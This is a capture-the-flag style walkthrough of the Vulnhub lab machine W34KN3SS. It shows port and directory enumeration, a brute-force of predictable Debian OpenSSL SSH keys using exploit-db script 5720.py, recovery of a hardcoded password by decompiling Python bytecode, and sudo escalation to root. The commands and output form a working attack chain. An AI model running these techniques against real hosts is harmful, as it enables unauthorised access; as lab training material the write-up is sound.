Home Vulnhub - W34KN3SS
Post
Cancel
Preview Image

Vulnhub - W34KN3SS

By yufongg
Posted 2022-01-28 Updated 2022-08-09 12 min read

Recon

NMAP Complete Scan 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

# Nmap 7.92 scan initiated Mon Jan 24 15:55:18 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/W34KN3SS/192.168.236.9/scans/_full_tcp_nmap.txt -oX /root/vulnHub/W34KN3SS/192.168.236.9/scans/xml/_full_tcp_nmap.xml 192.168.236.9
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -530426 microseconds.  Ignoring time.
Nmap scan report for 192.168.236.9
Host is up, received arp-response (0.00052s latency).
Scanned at 2022-01-24 15:55:19 +08 for 40s
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 de:89:a2:de:45:e7:d6:3d:ef:e9:bd:b4:b6:68:ca:6d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvkgmVahuBlxM6WUy6NSEAmWnYQbfKfrHwxT0rlZleQQ6Hyjd435lLBiA1kSyHzYxQ2l2WhiXefSycEtI8FntMjnOEFahCgobvsP5HblaUGAxmh+RPId+/U0OPwbF8WEtE2aM7ynaJ3eJt02iyHoFSTICNNiwAMX1sde/ADI2zXkssrjerwyTJLrI5JO1girvHJcJxJWvS3HFHyZbksKK6giPy7E8Q6Uz0sp5p+Qx4iqZ9kHkwwLZ+Yk56BupHZDvjDWx9Pi8qhnlwgaqUj/RbG/eEylxRtqQn2i1A6TQrWMcMTpN+P25Ws9TPV8cRiDQwEX+bx30HHgc5AQ+YDRkf
|   256 1d:98:4a:db:a2:e0:cc:68:38:93:d0:52:2a:1a:aa:96 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDyK5qz3tcYxvzJVZO2izBdS3LucZE0hUU4mOTja1WHO7Ma3plgqQoL52O+svarU9eHvf0sW5GqD02Bf+4ZQbWo=
|   256 3d:8a:6b:92:0d:ba:37:82:9e:c3:27:18:b6:01:cd:98 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOKeds8hqs+e9SnwnrnhhoV8IRh/CUlCgMmdTroLiuG
80/tcp  open  http     syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 400 Bad Request
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo/localityName=Amman/emailAddress=n30@weakness.jth
| Issuer: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo/localityName=Amman/emailAddress=n30@weakness.jth
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-05-05T11:12:54
| Not valid after:  2019-05-05T11:12:54
| MD5:   f921 c4be 2c6e 89d6 adaf a7c2 8f39 a87d
| SHA-1: 0b44 5a28 c4da 0bf8 b308 a782 4081 1218 101e 0feb
| -----BEGIN CERTIFICATE-----
| MIID0DCCArigAwIBAgIJAPo2he2sLvFHMA0GCSqGSIb3DQEBCwUAMH0xCzAJBgNV
| BAYTAmpvMQ8wDQYDVQQIDAZKb3JkYW4xDjAMBgNVBAcMBUFtbWFuMRUwEwYDVQQK
| DAx3ZWFrbmVzcy5qdGgxFTATBgNVBAMMDHdlYWtuZXNzLmp0aDEfMB0GCSqGSIb3
| DQEJARYQbjMwQHdlYWtuZXNzLmp0aDAeFw0xODA1MDUxMTEyNTRaFw0xOTA1MDUx
| MTEyNTRaMH0xCzAJBgNVBAYTAmpvMQ8wDQYDVQQIDAZKb3JkYW4xDjAMBgNVBAcM
| BUFtbWFuMRUwEwYDVQQKDAx3ZWFrbmVzcy5qdGgxFTATBgNVBAMMDHdlYWtuZXNz
| Lmp0aDEfMB0GCSqGSIb3DQEJARYQbjMwQHdlYWtuZXNzLmp0aDCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANq345qdUACB07H/jIZ+VTL3029pbwbiB2Ew
| 2ZoS0DpiIlz5Fvcd15/Diw/b2uCfXrTa7ka2wYeSP+hpipI6oKTB8+7nRuh+cugv
| bApck+17nDe7MeE30s7hO33QPHoCPrWmM6Z53vhF/ur3cyd9osKrAg9oPCXMBBKV
| e5/s+gW9c7mfn2u+tHm6nAVKScxVoFdXld0c7OKOZDqFLKK7zLPa5iHKIW9wadYC
| c71OAAA5tx5fcn4xVBjOSBQUMOqJMHER1sUMOpqrsyHme84TulgNTck24ndyiHcE
| DfkBlOaA+qWDwcxFw22NFkAeg3/ry/J6gTBrQkCRsh3Ncbgd/IsCAwEAAaNTMFEw
| HQYDVR0OBBYEFJQs/y0qng9kHtd0p7JuPc/Vq+iWMB8GA1UdIwQYMBaAFJQs/y0q
| ng9kHtd0p7JuPc/Vq+iWMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD
| ggEBAMDHIAbnghNdTW/dG9xLyTLkPZYsaAeKgq8B8D5HfNy5Oo7A3dUIit0fvjJv
| AFTV16v8dwWPv6mjWwf1Npzl9JNHiT+437ZO+eBn3utIwYa8nl58ZyMC2gZCo0/4
| htEK3RgIFnjU2qiBeEBHk+Z6chF4AWVtxJa+mXx4RfUPwK5+WwOUOY9QbymR8cUI
| 1qlPDrP3MTuDj8OY9ts17L/XLcyKTkX2zuDIS8wBgt+WoOCb6Hy9s4/PGYwJT5iy
| KVlQicmEiKU70In1cpPF1FSV7iLpMQXhspJADJ0lPTzc7WEpIoySpxX8SVQ8cq4b
| d07ykwyD+BS8XzcuFQgI/8ek0as=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:AD:E3:6B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/24%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61E
OS:E5B8F%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10F%TI=Z%II=I%TS=A)OPS(O
OS:1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11N
OS:W7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R
OS:=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)I
OS:E(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 16.920 days (since Fri Jan  7 17:51:33 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.236.9

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 24 15:56:00 2022 -- 1 IP address (1 host up) scanned in 42.27 seconds

TCP/80 (HTTP)

FFUF 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌──(root💀kali)-[~/vulnHub/W34KN3SS]
└─# ffuf -u http://192.168.236.9/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.php,.txt' -fw 22

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://192.168.236.9/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .php .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 22
________________________________________________

                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
blog                    [Status: 301, Size: 315, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
test                    [Status: 301, Size: 315, Words: 20, Lines: 10]
uploads                 [Status: 301, Size: 318, Words: 20, Lines: 10]
upload.php              [Status: 200, Size: 216, Words: 13, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 5637 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
  • index.html
  • blog
  • test
  • uploads
  • upload.php

TCP/443 (HTTPS)

FFUF

  • Same as TCP/80

NMAP Scan: 

1
2
3
4

PORT    STATE SERVICE  REASON         VERSION
443/tcp open  ssl/http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
| ssl-cert: Subject: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo/localityName=Amman/emailAddress=n30@weakness.jth
| Issuer: commonName=weakness.jth/organizationName=weakness.jth/stateOrProvinceName=Jordan/countryName=jo/localityName=Amman/emailAddress=n30@weakness.jth
  • weakness.jth
    • Usually it is localhost.localdomain

Initial Foothold

TCP/80 (HTTP) - Obtain some credentials

  1. Add weakness.jth to /etc/hosts
  2. View enumerated directories
    • index.html
      • n30 - Could be a username?
    • blog
      • Does not have HTTP PUT method
    • test
    • uploads
      • Does not have HTTP PUT method
    • upload.php
  3. Attempt to upload a file at upload.php
    • Failed to upload
  4. Decode Base64 Encoded text
    1
2
3

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
 └─# echo -n V0UgSlVTVCBURVNUIFRISVMgU0NSSVBUV0UgSlVTVCBURVNUIFRISVMgU0NSSVBUIEFHQUlOIDpE | base64 -d
 WE JUST TEST THIS SCRIPTWE JUST TEST THIS SCRIPT AGAIN :D
  5. Run FFUF against http://weakness.jth/FUZZ
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
 └─# ffuf -u http://weakness.jth/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php' -fw 22

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       

        v1.3.1 Kali Exclusive <3
 ________________________________________________

  :: Method           : GET
  :: URL              : http://weakness.jth/FUZZ
  :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
  :: Extensions       : .html .txt .php 
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403,405
  :: Filter           : Response words: 22
 ________________________________________________

                         [Status: 200, Size: 526, Words: 259, Lines: 31]
 index.html              [Status: 200, Size: 526, Words: 259, Lines: 31]
 index.html              [Status: 200, Size: 526, Words: 259, Lines: 31]
 private                 [Status: 301, Size: 314, Words: 20, Lines: 10]
 robots.txt              [Status: 200, Size: 14, Words: 4, Lines: 2]
 :: Progress: [18460/18460] :: Job [1/1] :: 82 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
    • New directories are enumerated
      • private
      • robots.txt
  6. View newly enumerated directories
    • robots.txt
      1
2
3

        ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
  └─# curl http://weakness.jth/robots.txt -s
  Forget it !!
    • private
      • Running a web app
  7. Run FFUF against /private, web app contains many directories which could have senstive information
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
 └─# ffuf -u http://weakness.jth/private/FUZZ -w /usr/share/wordlists/dirb/common.txt 

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       

        v1.3.1 Kali Exclusive <3
 ________________________________________________

  :: Method           : GET
  :: URL              : http://weakness.jth/private/FUZZ
  :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 ________________________________________________

 .htaccess               [Status: 403, Size: 304, Words: 22, Lines: 12]
 .htpasswd               [Status: 403, Size: 304, Words: 22, Lines: 12]
 .hta                    [Status: 403, Size: 299, Words: 22, Lines: 12]
 assets                  [Status: 301, Size: 321, Words: 20, Lines: 10]
                         [Status: 200, Size: 989, Words: 75, Lines: 44]
 files                   [Status: 301, Size: 320, Words: 20, Lines: 10]
 index.html              [Status: 200, Size: 989, Words: 75, Lines: 44]
 :: Progress: [4615/4615] :: Job [1/1] :: 62 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
    • New directories are enumerated
      • assets
      • files
  8. View enumerated directories
    • assets
    • files
      • Interesting files found

TCP/22 (SSH) - openssl 0.9.8c-1 Exploit

  1. View mykey.pub
    1
2
3

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
 └─# curl -s http://weakness.jth/private/files/mykey.pub
 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster
    • Target Machine Hostname: targetcluster
    • Private Key Path: /root/.ssh/id_rsa
  2. View notes.txt
    1
2
3

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS]
 └─# curl -s http://weakness.jth/private/files/notes.txt
 this key was generated by openssl 0.9.8c-1
    • openssl 0.9.8c-1

  3. Search exploits for openssl 0.9.8c-1

    #Exploit TitlePath
    1OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Forcelinux/remote/5622.txt
    2OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Forcelinux/remote/5632.rb
    3OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Forclinux/remote/5720.py
  4. openssl 0.9.8c-1 is exploitable because there are only 65.536 possible ssh keys generated.
  5. Use linux/remote/5720.py
    1. Follow the instructions in 5720.py
    2. Download 5622.tar.bz2
      1
2

       ┌──(root💀kali)-[~/vulnHub/W34KN3SS/192.168.236.9/exploit]
 └─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 -q
    3. Extract
      1
2
3
4
5
6

       ┌──(root💀kali)-[~/vulnHub/W34KN3SS/192.168.236.9/exploit]
 └─# tar -xvf 5622.tar.bz2
 rsa/2048/2c39076a750679c89ed30581f3371a03-21786.pub
 rsa/2048/34602375d32e68ab98b48ab008a1d0f9-8985
 rsa/2048/b009a4aaa5deae5f11c66a26d0a42de6-11400.pub
 ...
    4. Execute python script
      1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

       ┌──(root💀kali)-[~/vulnHub/W34KN3SS/192.168.236.9/exploit]
 └─# python 5720.py 
 -OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
 ./exploit.py <dir> <host> <user> [[port] [threads]]
     <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
     <host>: The victim host
     <user>: The user of the victim host
     [port]: The SSH port of the victim host (default 22)
     [threads]: Number of threads (default 4) Too big numer is bad

 ┌──(root💀kali)-[~/vulnHub/W34KN3SS/192.168.236.9/exploit/openssl-0.9.8c-1]
 └─# python 5720.py rsa/2048/ 192.168.236.9 n30 22 5

 -OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
 Tested 202 keys | Remaining 32566 keys | Aprox. Speed 40/sec

 Key Found in file: 4161de56829de2fe64b9055711f531c1-2537
 Execute: ssh -ln30 -p22 -i rsa/2048//4161de56829de2fe64b9055711f531c1-2537 192.168.236.9

 Tested 280 keys | Remaining 32488 keys | Aprox. Speed 15/sec

      1

           - Found key `4161de56829de2fe64b9055711f531c1-2537`  ![](images/Pasted%20image%2020220124202456.png) ## TCP/22 (SSH)
  6. SSH w/ 4161de56829de2fe64b9055711f531c1-2537
    1
2
3
4
5
6
7
8
9
10
11
12

     ┌──(root💀kali)-[~/vulnHub/W34KN3SS/192.168.236.9/exploit/openssl-0.9.8c-1]
 └─# ssh -p22 -i rsa/2048//4161de56829de2fe64b9055711f531c1-2537 n30@$ip
 Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

  * Documentation:  https://help.ubuntu.com
  * Management:     https://landscape.canonical.com
  * Support:        https://ubuntu.com/advantage

 Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

 Last login: Tue Aug 14 13:29:20 2018 from 192.168.209.1
 n30@W34KN3SS:~$

  7. User Flag
    1
2
3

     n30@W34KN3SS:~$ cat user.txt 
 25e3cd678875b601425c9356c8039f68
 n30@W34KN3SS:~$

Privilege Escalation

Root - Via Decompiling Python Binary + Sudo

  1. View n30 home directory
    1
2
3
4
5
6
7
8
9
10
11
12
13
14

     n30@W34KN3SS:~$ ls -la
 total 44
 drwxr-xr-x 5 n30  n30  4096 Aug 14  2018 .
 drwxr-xr-x 3 root root 4096 May  5  2018 ..
 -rw------- 1 n30  n30    25 Aug 14  2018 .bash_history
 -rw-r--r-- 1 n30  n30   220 May  5  2018 .bash_logout
 -rw-r--r-- 1 n30  n30  3771 May  5  2018 .bashrc
 drwx------ 2 n30  n30  4096 May  5  2018 .cache
 -rwxrwxr-x 1 n30  n30  1138 May  8  2018 code
 drwxrwxr-x 3 n30  n30  4096 May  5  2018 .local
 -rw-r--r-- 1 n30  n30   818 May  7  2018 .profile
 drwxrwxr-x 2 n30  n30  4096 May  5  2018 .ssh
 -rw-r--r-- 1 n30  n30     0 May  5  2018 .sudo_as_admin_successful
 -rw-rw-r-- 1 n30  n30    33 May  8  2018 user.txt
    • .sudo_as_admin_successful
      • n30 has a sudoers entry
    • code
  2. See what it does
    1
2
3
4
5
6
7
8
9

     n30@W34KN3SS:~$ file code
 code: python 2.7 byte-compiled
 n30@W34KN3SS:~$ python code
 [+]System Started at : Mon Jan 24 22:32:16 2022
 [+]This binary should generate unique hash for the hardcoded login info
 [+]Generating the hash ..
 [+]Your new hash is : 5e335c58fc4a146c0e4716472a34fb79a5c1515c1ea9e77e30d3ec5d172d268f
 [+]Done
 n30@W34KN3SS:~$
    • python2.7 byte-compiled
    • raw-sha256 (1400)
  3. Crack hash
    • Failed to crack
  4. Transfer code to kali
  5. Decompile code binary
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

     mv code code.pyc
 ┌──(uncompyle6)(root💀kali)-[~/tools/uncompyle6]
 └─# uncompyle6 -o compiled.py /root/vulnHub/W34KN3SS/192.168.236.9/loot/code 
	
 ┌──(uncompyle6)(root💀kali)-[~/tools/uncompyle6]
 └─# cat compiled.py 
 # uncompyle6 version 3.8.0
 # Python bytecode 2.7 (62211)
 # Decompiled from: Python 2.7.18 (default, Sep 24 2021, 09:39:51) 
 # [GCC 10.3.0]
 # Warning: this version of Python has problems handling the Python 3 byte type in constants properly.

 # Embedded file name: code.py
 # Compiled at: 2018-05-08 23:50:54
 import os, socket, time, hashlib
 print ('[+]System Started at : {0}').format(time.ctime())
 print '[+]This binary should generate unique hash for the hardcoded login info'
 print '[+]Generating the hash ..'
 inf = ''
 inf += chr(ord('n'))
 inf += chr(ord('3'))
 inf += chr(ord('0'))
 inf += chr(ord(':'))
 inf += chr(ord('d'))
 inf += chr(ord('M'))
 inf += chr(ord('A'))
 inf += chr(ord('S'))
 inf += chr(ord('D'))
 inf += chr(ord('N'))
 inf += chr(ord('B'))
 inf += chr(ord('!'))
 inf += chr(ord('!'))
 inf += chr(ord('#'))
 inf += chr(ord('B'))
 inf += chr(ord('!'))
 inf += chr(ord('#'))
 inf += chr(ord('!'))
 inf += chr(ord('#'))
 inf += chr(ord('3'))
 inf += chr(ord('3'))
 hashf = hashlib.sha256(inf + time.ctime()).hexdigest()
 print ('[+]Your new hash is : {0}').format(hashf)
 print '[+]Done'
    • n30:dMASDNB!!#B!#!#33
  6. Check sudo access
    1
2
3
4

     n30@W34KN3SS:~$ sudo -l
 [sudo] password for n30: dMASDNB!!#B!#!#33
 Matching Defaults entries for n30 on W34KN3SS:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  7. Switch to root
    1
2
3
4
5
6

     User n30 may run the following commands on W34KN3SS:
     (ALL : ALL) ALL
 n30@W34KN3SS:~$ sudo su
 root@W34KN3SS:/home/n30# whoami
 root
 root@W34KN3SS:/home/n30#

  8. Root flag
    1
2
3
4
5
6

     root@W34KN3SS:/home/n30# cd /root
 root@W34KN3SS:~# ls
 root.txt
 root@W34KN3SS:~# cat root.txt 
 a1d2fab76ec6af9b651d4053171e042e
 root@W34KN3SS:~#
Vulnhub, Linux
linux-priv-esc/sudo/unknown-exec
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Vulnhub - Toppo 1

Vulnhub - Prime 1

Comments powered by Disqus.